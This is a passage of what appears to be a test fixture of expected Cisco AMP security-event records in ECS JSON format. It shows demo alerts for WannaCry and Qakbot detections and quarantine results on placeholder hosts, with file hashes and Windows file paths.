Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412662850426241000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
"W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412662850426241033", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843677434Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419281601187807000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419281601187807332", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T18:03:55.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], 
+ "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843679334Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68
f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419281601187807000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419281601187807332", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T18:03:52.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": 
"windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843681225Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + 
"id": "6419281588302905000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419281588302905443", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843683113Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419281588302905000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419281588302905443", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": 
"2021-09-12T17:31:29.843684983Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411538569722069000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name 
not found", + "error_code": 3221225524 + }, + "detection_id": "6411538569722068995", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843686880Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411538569722069000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411538569722068994", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843688761Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6411538569722069000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411538569722068993", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "name": 
"igvj$vN.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe", + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843690628Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411538569722069000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "Auto.BAC7BC5281.in10.tht.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411538569722068995", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "file": { + "name": "6951045.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe", + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": 
[ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843705689Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411538569722069000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
